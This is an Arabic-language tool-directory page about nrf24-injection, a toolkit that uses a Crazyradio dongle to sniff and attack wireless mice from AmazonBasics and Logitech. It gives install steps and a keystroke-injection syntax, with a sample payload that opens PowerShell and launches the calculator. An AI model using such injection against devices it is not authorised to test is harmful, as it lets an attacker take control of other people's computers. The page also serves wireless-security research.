Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
nrf24-injection — مجموعة أدوات لاستشعار الأجهزة وشن الهجمات باستخدام Crazyradio | Kitploit
أدوات/GitHubGitHub/xswxm/nrf24-injection
الاستغلالأمن الشبكات اللاسلكيةاختراق الأجهزةاختبار الاختراق
GitHubxswxm/nrf24-injection

nrf24-injection

مجموعة أدوات لاستشعار الأجهزة وشن الهجمات باستخدام Crazyradio

عرض المستودعالموقع الإلكتروني
181منذ 8 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مجموعة أدوات لاستشعار الأجهزة وتنفيذ الهجمات باستخدام Crazyradio. استنادًا إلى أبحاث BastilleResearch.

الإعداد

تثبيت الوحدات الإضافية

root@kitploit:~
sudo apt-get install sdcc binutils python python-pip
sudo pip install -U pip
sudo pip install -U -I pyusb
sudo pip install -U platformio

الأجهزة المدعومة

الجهازاستشعارهجومالتفاصيل
AmazonBasicsنعم (غير مستجيب)نعمالتحكم بالفأرة وحقن HID
Logitech Miceنعمنعمالتحكم بالفأرة

كيفية الاستخدام

root@kitploit:~
# Run directly
sudo python app.py
# For Crazyradio PA users
sudo python app.py -l
# Check for help documents
sudo python app.py -h

كيفية استخدام هجمات الإطلاق

root@kitploit:~
# Please check attacking rules in 'devices/*.py' for details
# Further infomation will added to here once I have time
# Attacking thread sleeps for 100 milliseconds
<SLP(100)>
# Move mouse by 100*100 only
<MOV(100,100)>
# Press Left button only (Mouse)
<MOV(L)>
# Move mouse by 100*100 and press Left, Right and Middle buttons
<MOV(100,100,LMR)>
# Release the buttons for mice, you can send another MOV command without any buttons
<MOV(0,0)>
<MOV()>
# Send keystrokes to release all keys
<RLS>
# Send 'Windows + r' key combination
<WIN+r>
# Send 'Ctrl + Alt + Delete' key combination
<CTRL+ALT+DEL>
# For Windows computers, the following commmand will open the Powershell and then open the Caculator
<RLS><WIN+r><RLS><SLP(500)><RLS>powershell<ENTER><RLS><SLP(500)><RLS>calc<ENTER><RLS>

الترخيص

GPL

تنزيل الأداة